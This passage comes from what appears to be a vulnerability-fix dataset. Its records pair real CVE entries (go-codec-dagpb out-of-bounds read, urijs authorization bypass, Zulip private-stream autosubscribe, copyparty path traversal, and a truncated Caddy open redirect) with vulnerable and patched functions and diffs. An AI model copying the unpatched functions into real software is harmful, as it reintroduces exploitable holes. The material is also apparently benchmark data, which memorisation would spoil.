Memory Buffer", "description": "The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data."}}, "repo": "https://github.com/ipld/go-codec-dagpb", "patch_url": ["https://github.com/ipld/go-codec-dagpb/commit/a17ace35cc760a2698645c09868f9050fa219f57"], "programing_language": "Go", "vul_func": [{"id": "vul_go_297_1", "commit": "fa6d623cbc0da39a4940da01d7506d05df80c7ad", "file_path": "unmarshal.go", "start_line": 41, "end_line": 161, "snippet": "func DecodeBytes(na ipld.NodeAssembler, src []byte) error {\n\tremaining := src\n\n\tma, err := na.BeginMap(2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar links ipld.ListAssembler\n\n\thaveData := false\n\thaveLinks := false\n\tfor {\n\t\tif len(remaining) == 0 {\n\t\t\tbreak\n\t\t}\n\n\t\tfieldNum, wireType, n := protowire.ConsumeTag(remaining)\n\t\tif n < 0 {\n\t\t\treturn protowire.ParseError(n)\n\t\t}\n\t\tremaining = remaining[n:]\n\n\t\tif wireType != 2 {\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid wireType, expected 2, got %d\", wireType)\n\t\t}\n\n\t\t// Note that we allow Data and Links to come in either order,\n\t\t// since the spec defines that decoding \"should\" accept either form.\n\t\t// This is for backwards compatibility with older IPFS data.\n\n\t\tswitch fieldNum {\n\t\tcase 1:\n\t\t\tif haveData {\n\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Data section\")\n\t\t\t}\n\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links != nil {\n\t\t\t\t// Links came before Data.\n\t\t\t\t// Finish them before we start Data.\n\t\t\t\tif err := links.Finish(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks = nil\n\t\t\t}\n\n\t\t\tif err := ma.AssembleKey().AssignString(\"Data\"); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := ma.AssembleValue().AssignBytes(chunk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveData = true\n\n\t\tcase 2:\n\t\t\tbytesLen, n := protowire.ConsumeVarint(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links == nil {\n\t\t\t\tif haveLinks {\n\t\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Links section\")\n\t\t\t\t}\n\n\t\t\t\t// The repeated \"Links\" part begins.\n\t\t\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks, err = ma.AssembleValue().BeginList(0)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tcurLink, err := links.AssembleValue().BeginMap(3)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := unmarshalLink(remaining[:bytesLen], curLink); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tremaining = remaining[bytesLen:]\n\t\t\tif err := curLink.Finish(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveLinks = true\n\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid fieldNumber, expected 1 or 2, got %d\", fieldNum)\n\t\t}\n\t}\n\n\tif links != nil {\n\t\t// We had some links at the end, so finish them.\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t} else if !haveLinks {\n\t\t// We didn't have any links.\n\t\t// Since we always want a Links field, add one 
here.\n\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlinks, err := ma.AssembleValue().BeginList(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn ma.Finish()\n}"}], "fix_func": [{"id": "fix_go_297_1", "commit": "a17ace35cc760a2698645c09868f9050fa219f57", "file_path": "unmarshal.go", "start_line": 41, "end_line": 160, "snippet": "func DecodeBytes(na ipld.NodeAssembler, src []byte) error {\n\tremaining := src\n\n\tma, err := na.BeginMap(2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar links ipld.ListAssembler\n\n\thaveData := false\n\thaveLinks := false\n\tfor {\n\t\tif len(remaining) == 0 {\n\t\t\tbreak\n\t\t}\n\n\t\tfieldNum, wireType, n := protowire.ConsumeTag(remaining)\n\t\tif n < 0 {\n\t\t\treturn protowire.ParseError(n)\n\t\t}\n\t\tremaining = remaining[n:]\n\n\t\tif wireType != 2 {\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid wireType, expected 2, got %d\", wireType)\n\t\t}\n\n\t\t// Note that we allow Data and Links to come in either order,\n\t\t// since the spec defines that decoding \"should\" accept either form.\n\t\t// This is for backwards compatibility with older IPFS data.\n\n\t\tswitch fieldNum {\n\t\tcase 1:\n\t\t\tif haveData {\n\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Data section\")\n\t\t\t}\n\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links != nil {\n\t\t\t\t// Links came before Data.\n\t\t\t\t// Finish them before we start Data.\n\t\t\t\tif err := links.Finish(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks = nil\n\t\t\t}\n\n\t\t\tif err := ma.AssembleKey().AssignString(\"Data\"); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := ma.AssembleValue().AssignBytes(chunk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveData = true\n\n\t\tcase 2:\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links == nil {\n\t\t\t\tif haveLinks {\n\t\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Links section\")\n\t\t\t\t}\n\n\t\t\t\t// The repeated \"Links\" part begins.\n\t\t\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks, err = ma.AssembleValue().BeginList(0)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tcurLink, err := links.AssembleValue().BeginMap(3)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := unmarshalLink(chunk, curLink); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := curLink.Finish(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveLinks = true\n\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid fieldNumber, expected 1 or 2, got %d\", fieldNum)\n\t\t}\n\t}\n\n\tif links != nil {\n\t\t// We had some links at the end, so finish them.\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t} else if !haveLinks {\n\t\t// We didn't have any links.\n\t\t// Since we always want a Links field, add one here.\n\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlinks, err := ma.AssembleValue().BeginList(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn 
ma.Finish()\n}"}], "vul_patch": "--- a/unmarshal.go\n+++ b/unmarshal.go\n@@ -58,7 +58,7 @@\n \t\t\thaveData = true\n \n \t\tcase 2:\n-\t\t\tbytesLen, n := protowire.ConsumeVarint(remaining)\n+\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n \t\t\tif n < 0 {\n \t\t\t\treturn protowire.ParseError(n)\n \t\t\t}\n@@ -83,10 +83,9 @@\n \t\t\tif err != nil {\n \t\t\t\treturn err\n \t\t\t}\n-\t\t\tif err := unmarshalLink(remaining[:bytesLen], curLink); err != nil {\n+\t\t\tif err := unmarshalLink(chunk, curLink); err != nil {\n \t\t\t\treturn err\n \t\t\t}\n-\t\t\tremaining = remaining[bytesLen:]\n \t\t\tif err := curLink.Finish(); err != nil {\n \t\t\t\treturn err\n \t\t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0613", "cve_description": "Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/6ea641cc8648b025ed5f30b090c2abd4d1a5249f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_156_1", "commit": "19e54c7", "file_path": "src/URI.js", "start_line": 490, "end_line": 549, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_156_1", "commit": "6ea641c", "file_path": "src/URI.js", "start_line": 490, "end_line": 549, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n // 
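Note on the go-codec-dagpb record above (CWE-119): the vulnerable `DecodeBytes` read a length with `protowire.ConsumeVarint` and then sliced `remaining[:bytesLen]` without checking that `bytesLen` fit in the buffer, so a crafted varint could index past the end; the fix switches to `protowire.ConsumeBytes`, which performs that bounds check itself. The sketch below restates the pattern in Python under hypothetical framing (a 4-byte big-endian length prefix, not dag-pb's varint wire format); Python slices truncate rather than crash, so the validation must be explicit either way.

```python
# Minimal sketch of length-prefixed parsing with an explicit bounds check.
# The 4-byte big-endian prefix is an assumption for illustration; dag-pb
# itself uses protobuf varints, but the validation discipline is the same.
def decode_records(buf: bytes) -> list[bytes]:
    records = []
    pos = 0
    while pos < len(buf):
        if pos + 4 > len(buf):
            raise ValueError("truncated length prefix")
        length = int.from_bytes(buf[pos:pos + 4], "big")
        pos += 4
        # The crucial check: never trust an attacker-controlled length
        # field without comparing it against the bytes actually remaining.
        if length > len(buf) - pos:
            raise ValueError("declared length exceeds remaining bytes")
        records.append(buf[pos:pos + length])
        pos += length
    return records

if __name__ == "__main__":
    ok = (3).to_bytes(4, "big") + b"abc"
    print(decode_records(ok))            # [b'abc']
    bad = (100).to_bytes(4, "big") + b"abc"
    try:
        decode_records(bad)
    except ValueError as exc:
        print("rejected:", exc)          # declared length exceeds remaining bytes
```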
[protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -24,7 +24,7 @@\n }\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n- string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/, '$1://');\n+ string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-0881", "cve_description": "An error in the implementation of an autosubscribe feature in the check_stream_exists route of the Zulip group chat application server before 1.4.3 allowed an authenticated user to subscribe to a private stream that should have required an invitation from an existing member to join. 
The issue affects all previously released versions of the Zulip server.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/7ecda1ac8e26d8fb3725e954b2dc4723dda2255f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_354_1", "commit": "7e0ce22808f70793ba1aeab6da46c539296cdec7", "file_path": "zerver/views/streams.py", "start_line": 475, "end_line": 491, "snippet": "def stream_exists_backend(request, user_profile, stream_id, autosubscribe):\n # type: (HttpRequest, UserProfile, int, bool) -> HttpResponse\n try:\n stream = get_and_validate_stream_by_id(stream_id, user_profile.realm)\n except JsonableError:\n stream = None\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n if autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n recipient=recipient)\n\n return json_success(result) # results are ignored for HEAD requests\n return json_response(data=result, status=404)"}], "fix_func": [{"id": "fix_py_354_1", "commit": "7ecda1ac8e26d8fb3725e954b2dc4723dda2255f", "file_path": "zerver/views/streams.py", "start_line": 475, "end_line": 491, "snippet": "def stream_exists_backend(request, user_profile, stream_id, autosubscribe):\n # type: (HttpRequest, UserProfile, int, bool) -> HttpResponse\n try:\n stream = get_and_validate_stream_by_id(stream_id, user_profile.realm)\n except JsonableError:\n stream = None\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n if not stream.invite_only and autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n recipient=recipient)\n\n return json_success(result) # results are ignored for HEAD requests\n return json_response(data=result, status=404)"}], "vul_patch": "--- a/zerver/views/streams.py\n+++ b/zerver/views/streams.py\n@@ -7,7 +7,7 @@\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n- if autosubscribe:\n+ if not stream.invite_only and autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-37474", "cve_description": "Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. 
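Note on CVE-2017-0881 above: the one-line fix gates the subscribe side effect on `stream.invite_only`, turning an authentication check into a proper authorization check. Being allowed to ask "does this stream exist?" must not imply being allowed to join it. A self-contained sketch of the guard (class and field names are illustrative stand-ins, not Zulip's models):

```python
from dataclasses import dataclass, field

@dataclass
class Stream:
    name: str
    invite_only: bool
    subscribers: set = field(default_factory=set)

def check_stream_exists(stream: Stream, user: str, autosubscribe: bool) -> dict:
    # The added guard: the state-changing side effect only fires when the
    # resource's own access policy permits self-service joins.
    if not stream.invite_only and autosubscribe:
        stream.subscribers.add(user)
    return {"exists": True, "subscribed": user in stream.subscribers}

private = Stream("deals", invite_only=True)
print(check_stream_exists(private, "mallory", autosubscribe=True))
# {'exists': True, 'subscribed': False} -- no silent join of a private stream
```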
There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/9001/copyparty", "patch_url": ["https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff"], "programing_language": "Python", "vul_func": [{"id": "vul_py_216_1", "commit": "8f59afb", "file_path": "copyparty/httpcli.py", "start_line": 751, "end_line": 864, "snippet": " def handle_get(self) -> bool:\n if self.do_log:\n logmsg = \"%-4s %s @%s\" % (self.mode, self.req, self.uname)\n\n if \"range\" in self.headers:\n try:\n rval = self.headers[\"range\"].split(\"=\", 1)[1]\n except:\n rval = self.headers[\"range\"]\n\n logmsg += \" [\\033[36m\" + rval + \"\\033[0m]\"\n\n self.log(logmsg)\n\n # \"embedded\" resources\n if self.vpath.startswith(\".cpr\"):\n if self.vpath.startswith(\".cpr/ico/\"):\n return self.tx_ico(self.vpath.split(\"/\")[-1], exact=True)\n\n if self.vpath.startswith(\".cpr/ssdp\"):\n return self.conn.hsrv.ssdp.reply(self)\n\n if self.vpath.startswith(\".cpr/dd/\") and self.args.mpmc:\n if self.args.mpmc == \".\":\n raise Pebkac(404)\n\n loc = self.args.mpmc.rstrip(\"/\") + self.vpath[self.vpath.rfind(\"/\") :]\n h = {\"Location\": loc, \"Cache-Control\": \"max-age=39\"}\n self.reply(b\"\", 301, headers=h)\n return True\n\n static_path = os.path.join(self.E.mod, \"web/\", self.vpath[5:])\n return self.tx_file(static_path)\n\n if \"cf_challenge\" in self.uparam:\n self.reply(self.j2s(\"cf\").encode(\"utf-8\", \"replace\"))\n return True\n\n if not self.can_read and not self.can_write and not self.can_get:\n t = \"@{} has no access to [{}]\"\n self.log(t.format(self.uname, self.vpath))\n\n if \"on403\" in self.vn.flags:\n ret = self.on40x(self.vn.flags[\"on403\"], self.vn, self.rem)\n if ret == \"true\":\n return True\n elif ret == \"false\":\n return False\n elif ret == \"allow\":\n self.log(\"plugin override; access permitted\")\n self.can_read = self.can_write = self.can_move = True\n self.can_delete = self.can_get = self.can_upget = True\n self.can_admin = True\n else:\n return self.tx_404(True)\n else:\n if self.vpath:\n return self.tx_404(True)\n\n self.uparam[\"h\"] = \"\"\n\n if \"tree\" in self.uparam:\n return self.tx_tree()\n\n if \"scan\" in self.uparam:\n return self.scanvol()\n\n if self.args.getmod:\n if \"delete\" in self.uparam:\n return self.handle_rm([])\n\n if \"move\" in self.uparam:\n return self.handle_mv()\n\n if not self.vpath:\n if \"reload\" in self.uparam:\n return self.handle_reload()\n\n if \"stack\" in self.uparam:\n return self.tx_stack()\n\n if \"ups\" in self.uparam:\n return self.tx_ups()\n\n if \"k304\" in self.uparam:\n return self.set_k304()\n\n if \"setck\" in self.uparam:\n return self.setck()\n\n if \"reset\" in self.uparam:\n return self.set_cfg_reset()\n\n if \"hc\" in self.uparam:\n return self.tx_svcs()\n\n if \"h\" in self.uparam:\n return self.tx_mounts()\n\n # 
conditional redirect to single volumes\n if self.vpath == \"\" and not self.ouparam:\n nread = len(self.rvol)\n nwrite = len(self.wvol)\n if nread + nwrite == 1 or (self.rvol == self.wvol and nread == 1):\n if nread == 1:\n vpath = self.rvol[0]\n else:\n vpath = self.wvol[0]\n\n if self.vpath != vpath:\n self.redirect(vpath, flavor=\"redirecting to\", use302=True)\n return True\n\n return self.tx_browser()"}], "fix_func": [{"id": "fix_py_216_1", "commit": "043e3c7", "file_path": "copyparty/httpcli.py", "start_line": 752, "end_line": 872, "snippet": " def handle_get(self) -> bool:\n if self.do_log:\n logmsg = \"%-4s %s @%s\" % (self.mode, self.req, self.uname)\n\n if \"range\" in self.headers:\n try:\n rval = self.headers[\"range\"].split(\"=\", 1)[1]\n except:\n rval = self.headers[\"range\"]\n\n logmsg += \" [\\033[36m\" + rval + \"\\033[0m]\"\n\n self.log(logmsg)\n\n # \"embedded\" resources\n if self.vpath.startswith(\".cpr\"):\n if self.vpath.startswith(\".cpr/ico/\"):\n return self.tx_ico(self.vpath.split(\"/\")[-1], exact=True)\n\n if self.vpath.startswith(\".cpr/ssdp\"):\n return self.conn.hsrv.ssdp.reply(self)\n\n if self.vpath.startswith(\".cpr/dd/\") and self.args.mpmc:\n if self.args.mpmc == \".\":\n raise Pebkac(404)\n\n loc = self.args.mpmc.rstrip(\"/\") + self.vpath[self.vpath.rfind(\"/\") :]\n h = {\"Location\": loc, \"Cache-Control\": \"max-age=39\"}\n self.reply(b\"\", 301, headers=h)\n return True\n\n path_base = os.path.join(self.E.mod, \"web\")\n static_path = absreal(os.path.join(path_base, self.vpath[5:]))\n if not static_path.startswith(path_base):\n t = \"attempted path traversal [{}] => [{}]\"\n self.log(t.format(self.vpath, static_path), 1)\n self.tx_404()\n return False\n\n return self.tx_file(static_path)\n\n if \"cf_challenge\" in self.uparam:\n self.reply(self.j2s(\"cf\").encode(\"utf-8\", \"replace\"))\n return True\n\n if not self.can_read and not self.can_write and not self.can_get:\n t = \"@{} has no access to [{}]\"\n self.log(t.format(self.uname, self.vpath))\n\n if \"on403\" in self.vn.flags:\n ret = self.on40x(self.vn.flags[\"on403\"], self.vn, self.rem)\n if ret == \"true\":\n return True\n elif ret == \"false\":\n return False\n elif ret == \"allow\":\n self.log(\"plugin override; access permitted\")\n self.can_read = self.can_write = self.can_move = True\n self.can_delete = self.can_get = self.can_upget = True\n self.can_admin = True\n else:\n return self.tx_404(True)\n else:\n if self.vpath:\n return self.tx_404(True)\n\n self.uparam[\"h\"] = \"\"\n\n if \"tree\" in self.uparam:\n return self.tx_tree()\n\n if \"scan\" in self.uparam:\n return self.scanvol()\n\n if self.args.getmod:\n if \"delete\" in self.uparam:\n return self.handle_rm([])\n\n if \"move\" in self.uparam:\n return self.handle_mv()\n\n if not self.vpath:\n if \"reload\" in self.uparam:\n return self.handle_reload()\n\n if \"stack\" in self.uparam:\n return self.tx_stack()\n\n if \"ups\" in self.uparam:\n return self.tx_ups()\n\n if \"k304\" in self.uparam:\n return self.set_k304()\n\n if \"setck\" in self.uparam:\n return self.setck()\n\n if \"reset\" in self.uparam:\n return self.set_cfg_reset()\n\n if \"hc\" in self.uparam:\n return self.tx_svcs()\n\n if \"h\" in self.uparam:\n return self.tx_mounts()\n\n # conditional redirect to single volumes\n if self.vpath == \"\" and not self.ouparam:\n nread = len(self.rvol)\n nwrite = len(self.wvol)\n if nread + nwrite == 1 or (self.rvol == self.wvol and nread == 1):\n if nread == 1:\n vpath = self.rvol[0]\n else:\n vpath = 
self.wvol[0]\n\n if self.vpath != vpath:\n self.redirect(vpath, flavor=\"redirecting to\", use302=True)\n return True\n\n return self.tx_browser()"}], "vul_patch": "--- a/copyparty/httpcli.py\n+++ b/copyparty/httpcli.py\n@@ -29,7 +29,14 @@\n self.reply(b\"\", 301, headers=h)\n return True\n \n- static_path = os.path.join(self.E.mod, \"web/\", self.vpath[5:])\n+ path_base = os.path.join(self.E.mod, \"web\")\n+ static_path = absreal(os.path.join(path_base, self.vpath[5:]))\n+ if not static_path.startswith(path_base):\n+ t = \"attempted path traversal [{}] => [{}]\"\n+ self.log(t.format(self.vpath, static_path), 1)\n+ self.tx_404()\n+ return False\n+\n return self.tx_file(static_path)\n \n if \"cf_challenge\" in self.uparam:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-28923", "cve_description": "Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/caddyserver/caddy", "patch_url": ["https://github.com/caddyserver/caddy/commit/78b5356f2b1945a90de1ef7f2c7669d82098edbd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_220_1", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 17, "end_line": 30, "snippet": "import (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"path/filepath\"\n\t\"strconv\"\n\t\"strings\"\n\n\t\"github.com/caddyserver/caddy/v2\"\n\t\"github.com/caddyserver/caddy/v2/caddyconfig/caddyfile\"\n)"}, {"id": "vul_go_220_2", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 230, "end_line": 247, "snippet": "func SanitizedPathJoin(root, reqPath string) string {\n\treqPath, _ = url.PathUnescape(reqPath)\n\tif root == \"\" {\n\t\troot = \".\"\n\t}\n\n\tpath := filepath.Join(root, filepath.Clean(\"/\"+reqPath))\n\n\t// filepath.Join also cleans the path, and cleaning strips\n\t// the trailing slash, so we need to re-add it afterwards.\n\t// if the length is 1, then it's a path to the root,\n\t// and that should return \".\", so we don't append the separator.\n\tif strings.HasSuffix(reqPath, \"/\") && len(reqPath) > 1 {\n\t\tpath += separator\n\t}\n\n\treturn path\n}"}, {"id": "vul_go_220_3", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/fileserver/browsetplcontext.go", "start_line": 31, "end_line": 89, "snippet": "func (fsrv *FileServer) directoryListing(files []os.FileInfo, canGoUp bool, root, urlPath string, repl *caddy.Replacer) browseTemplateContext {\n\tfilesToHide := fsrv.transformHidePaths(repl)\n\n\tvar dirCount, fileCount int\n\tfileInfos := []fileInfo{}\n\n\tfor _, f := range files {\n\t\tname := f.Name()\n\n\t\tif fileHidden(name, filesToHide) {\n\t\t\tcontinue\n\t\t}\n\n\t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n\n\t\tu := url.URL{Path: url.PathEscape(name)}\n\n\t\t// add the slash after the escape of path to avoid escaping the slash as well\n\t\tif isDir {\n\t\t\tu.Path += \"/\"\n\t\t\tdirCount++\n\t\t} else {\n\t\t\tfileCount++\n\t\t}\n\n\t\tsize := f.Size()\n\t\tfileIsSymlink := isSymlink(f)\n\t\tif fileIsSymlink {\n\t\t\tpath := caddyhttp.SanitizedPathJoin(root, path.Join(urlPath, f.Name()))\n\t\t\tfileInfo, err := os.Stat(path)\n\t\t\tif err == 
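Note on CVE-2023-37474 above: the vulnerable handler joined `self.vpath[5:]` straight onto the bundled web-root, so `/.cpr/../../etc/passwd`-style requests could escape it; the fix resolves the joined path with `absreal` and rejects anything whose resolved form leaves `path_base`. The Python sketch below shows the same containment idea with a slightly stricter comparison: `os.path.commonpath` instead of a bare prefix test, since `startswith("/srv/webroot")` would also accept a sibling directory like `/srv/webroot-evil` (the root path here is hypothetical):

```python
import os.path

def safe_static_path(root: str, user_path: str) -> str:
    base = os.path.realpath(root)
    # realpath resolves "..", ".", and symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path traversal attempt: {user_path!r}")
    return candidate

print(safe_static_path("/srv/webroot", "css/ui.css"))
try:
    safe_static_path("/srv/webroot", "../../etc/passwd")
except PermissionError as exc:
    print(exc)
```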
